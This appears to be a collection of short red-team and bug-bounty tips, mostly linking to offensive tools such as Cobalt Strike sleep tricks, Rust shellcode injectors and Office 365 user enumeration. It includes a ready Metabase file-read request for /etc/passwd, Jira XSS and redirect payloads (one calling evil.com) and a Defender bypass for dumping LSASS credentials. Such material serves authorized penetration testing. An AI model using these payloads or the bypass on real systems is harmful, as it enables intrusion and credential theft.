APT

CVE-2021-41277 MetaBase Arbitrary File Read PoC: GET /api/geojson?url=file:/etc/passwd HTTP/1.1 #metabase #cve #poc

Cloudmare Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS. https://github.com/MrH0wl/Cloudmare #bugbounty #cloudflare #tracker #ip

Windows Privileges https://speakerdeck.com/fr0gger/windows-privileges #windows #privileges #cheatsheet

GPUSleep Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep. # https://github.com/oXis/GPUSleep # https://oxis.github.io/GPUSleep/ #redteam #gpu #sleep #beacon

Atlassian Jira Payloads /secure/QueryComponent!Default.jspa /secure/ViewUserHover.jspa /ViewUserHover.jspa?username=Admin /rest/api/2/dashboard?maxResults=100 /pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm /rest/api/2/user/picker?query=admin /plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true /secure/ConfigurePortalPages!default.jspa?view=popular /secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false /secure/ContactAdministrators!default.jspa #bugbounty #jira #payloads

Microsoft Exchange Deserialization RCE (CVE-2021–42321) https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852 #exchange #rce #cve #deserialization

When You sysWhisper Loud Enough for AV to Hear You https://captmeelo.com/redteam/maldev/2021/11/18/av-evasion-syswhisper.html #av #evasion #syswhisper

Default Passwords Before performing password attacks, it is worth trying a couple of default passwords against the targeted service. Here are some website that provide default passwords for various products. # https://cirt.net/passwords # https://default-password.info/ # https://datarecovery.com/rd/default-passwords/ #default #passwords #services

Oh365 User Finder Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to identify the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid. https://github.com/dievus/Oh365UserFinder #office365 #user #enumeration

OffensiveRust — Rust Weaponization for Red Team Engagements. Examples in this repo:

• Allocate_With_Syscalls — It uses NTDLL functions directly with the ntapi Library
• Create_DLL — Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
• DeviceIoControl — Opens driver handle and executing DeviceIoControl
• EnableDebugPrivileges — Enable SeDebugPrivilege in the current process
• Shellcode_Local_inject — Executes shellcode directly in local process by casting pointer
• Execute_With_CMD — Executes cmd by passing a command via Rust
• ImportedFunctionCall — It imports minidump from dbghelp and executes it
• Kernel_Driver_Exploit — Kernel Driver exploit for a simple buffer overflow
• Named_Pipe_Client — Named Pipe Client
• Named_Pipe_Server — Named Pipe Server
• Process_Injection_CreateThread — Process Injection in remote process with CreateRemoteThread
• Unhooking — Unhooking calls
• asm_syscall — Obtaining PEB address via asm
• base64_system_enum — Base64 encoding/decoding strings
• http-https-requests — HTTP/S requests by ignoring cert check for GET/POST
• patch_etw — Patch ETW
• ppid_spoof — Spoof parent process for created process
• tcp_ssl_client — TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
• tcp_ssl_server — TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
• wmi_execute — Executes WMI query to obtain the AV/EDRs in the host
• Windows.h+ Bindings — This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
• UUID_Shellcode_Execution — Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

https://github.com/trickster0/OffensiveRust #rust #redteam #malware

KerbMon Continuous kerberoast monitor https://github.com/Retrospected/kerbmon #kerberos #monitor #pentest

DLL Hollowing Deep dive into a stealthier DLL hollowing/memory allocation variant. https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/ #malware #dll #hollowing

InlineWhispers2 Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2 https://github.com/Sh0ckFR/InlineWhispers2 #cobaltstrike #BOF #syswhispers

Bypass Defender and dump LSASS via procdump.exe If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS. #lsass #dump #defender #bypass #dump64

The Pentester's Guide https://0xffsec.com/handbook/ #bugbounty #handbook #pentest

Git Cheat Sheet #git #cheatsheet

Taking the pain out of C2 Infrastructure # https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure # https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4 #c2 #redteam #infrastructure

Living Off Trusted Sites (LOTS) Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. https://lots-project.com #lots #redteam #blueteam #sites

Sed Cheat Sheet Useful sed scripts & patterns. https://github.com/adrianscheff/useful-sed #sed #cheatsheet #bash